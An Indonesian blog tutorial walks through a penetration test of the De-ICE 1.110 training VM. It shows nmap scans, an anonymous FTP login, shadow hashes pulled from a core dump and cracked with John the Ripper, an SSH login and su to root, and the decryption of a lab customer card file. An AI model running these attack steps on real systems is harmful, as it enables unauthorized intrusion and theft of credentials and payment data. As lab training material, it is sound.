Searching...
October 28, 2011
Friday, October 28, 2011

Uji Penetrasi pada De-ICE Level #1 Disk #2 (De-Ice.net-1.110-1.1)

Setelah melakukan instalasi De-ICE, sekarang kita akan melakukan uji penetrasi atau penetration testing De-ICE. Ini akan sangat sangat sangat panjang, so siapin fisik (sedia kopi, rokok, kacang) sama mental (tidur cukup, jangan cari ribut sama pacar) buat baca modul hacking kali ini. Langsung aja, jalankan De-ICE pada VMware dan buka terminal. Berikut modulnya.

Gambar De-ICE

Module:
root@bt5r1:~# nmap -n 192.168.1.1-255
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.2
Host is up (0.0000080s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
902/tcp  open  iss-realsecure
9876/tcp open  sd

Nmap scan report for 192.168.1.110
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
631/tcp open  ipp
MAC Address: 00:0C:29:FB:68:A2 (VMware)

Nmap scan report for 192.168.1.254
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.254 are filtered
MAC Address: 00:50:56:F4:F6:BF (VMware)

Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds

Dari sini kita bisa melihat, 192.168.1.2 adalah IP kita, berarti 192.168.1.110 adalah IP De-ICE. Setelah mengetahui IP target, maka langkah berikutnya adalah mencari informasi lebih jauh tentang port yang terbuka dan service yang kemungkinan berjalan.

Module:
root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.110
Host is up (0.034s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 2.0.4
22/tcp  open  ssh?
80/tcp  open  http    Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open  ipp     CUPS 1.1
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds

Dari hasil scan, dapat dilihat bahwa korban mempunyai port ftp, ssh, dan httpd (Apache = Web Server) yang aktif. Informasi terasa sangat kurang, untuk itu, mari kita login ftp sebagai akun anonim untuk mencari tau lebih jauh lagi.

Module:
root@bt5r1:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password: (biarkan kosong lalu tekan "Enter")
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Sampai di sini kita telah berhasil masuk ke ftp, selanjutnya, kita akan mengeksplorasi struktur direktori sistem.

Modul:
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0              80 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    6 1000     513           340 Mar 15  2007 .
drwxr-xr-x    7 1000     513           160 Mar 15  2007 ..
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11
-rw-r--r--    1 1000     513        362436 Mar 03  2007 core
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts
-rw-r--r--    1 1000     513           780 Apr 30  2005 hosts
-rw-r--r--    1 1000     513           718 Jul 03  2005 inputrc
-rw-r--r--    1 1000     513          1296 Jun 10  2006 issue
[snip...]
226 Directory send OK.

Lihat ada file core yang menyimpan data core dump (memory, storage, dan debugging dump). Ambil file ini untuk dianalisa, lalu kita logout ftp client.

Module:
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.03 secs (13026.4 kB/s)
ftp> exit
221 Goodbye.

Mari kita lihat file core ini. File yang kita download via ftp tadi akan otomatis tersimpat di direktori home kita, yaitu /root/

Module:
root@bt5r1:~# strings core 
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d 
CORE
CORE
FLINUX
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[snip...]
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Wow! Lihat huruf yang dicetak tebal berwarna merah. Itu adalah hash string password milik user De-ICE. Lalu apa selanjutnya? Kita harus melakukan cracking attack password. Ini bisa dilakukan dengan progran John The Ripper. Kita membutuhkan sebuah dictionary untuk membantu proses cracking password. Kamu bisa mendapatkan dictionary-nya di sini.

Module:
root@bt5r1:~# cd dictionaries/
root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >>  /root/passwords
root@bt5r1:~/dictionaries# cd ~

Modul di atas dilakukan untuk melakukan compiling dictionary common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt
menjadi passwords di direktori /root/

Oke, kita telah mendapatkan passwordnya, sekarang, kita perlu menyusun string shadow, bermodal dari dump core yang tadi kita ambil.

Module:
root@bt5r1:~# nano /root/shadow

Setelah itu copy-paste dump core yang tercetak merah di atas:

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Buang bagian merah di atas dan susun serapih mungkin menjadi:

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Oke, kita sudah punya shadow dari empat user, yaitu:
root, aadams, bbanter, ccoffee

Saatnya cracking! Kita sudah mempunyai file shadow dan password library di direktori /root/ Sekarang, lakukan modul ini:

root@bt5r1:~# cd /pentest/passwords/john/
root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow 
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)
guesses: 3  time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011)  c/s: 6022  trying: Meteorologic
Session aborted

Penjelasan dari modul di atas:
Kita manggunakan software bernama John The Ripper pada direktori /pentest/passwords/john/ dengan aturan library ada di /root/passwords dan target hash string di /root/shadow. Hasilnya, ada 3 password yang ter-crack dalam waktu 0:00:04:40. Yaitu:


Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)

Wah, sudah dapat passwordnya? Lantas bagaimana? Itu terserah kalian, tap berikut adalah module apa yang saya kerjakan setelah mendapatkan password-nya:

root@blue-dragon:~# ssh bbanter@192.168.1.110
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:2
RSA host key for 192.168.1.110 has changed and you have requested strict checking.
Host key verification failed.
root@blue-dragon:~# nano /root/.ssh/known_hosts
root@blue-dragon:~# ssh bbanter@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
bbanter@192.168.1.110's password: [masukkan sesuai hasil crack]
Linux 2.6.16.
bbanter@slax:~$ ls -a
./  ../  .screenrc
bbanter@slax:~$ cd ..
bbanter@slax:/home$ ls -a
./  ../  aadams/  bbanter/  ccoffee/  ftp/  root/
bbanter@slax:/home$ cd root/
bbanter@slax:/home/root$ ls -a
./  ../  .save/  .screenrc
bbanter@slax:/home/root$ cd .save/
-bash: cd: .save/: Permission denied
bbanter@slax:/home/root$ su
Password: **********
root@slax:/home/root# pwd
/home/root
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls -a
.  ..  copy.sh customer_account.csv.enc
root@slax:/home/root/.save# cat copy.sh 
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:
3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:
root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls -a
.  ..  .enc  copy.sh  customer_account.csv  customer_account.csv.enc
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save# 

Apa yang saya kerjakan adalah mencoba masuk ke direktori yang tingkat privilege-nya tinggi, yaitu /root/.save. Setelah masuk ternyata ada file tentang customer, cara mengambilnya adalah dengan menjalankan modul copy.sh dengan sedikit perbaikan syntax.

Sekian tutor dari saya, selamat bersenang-senang (=

By: Blue Dragon
Powered by: Red DragonHate Talk, and g0tmi1k 

0 comment:

Post a Comment

 
Back to top!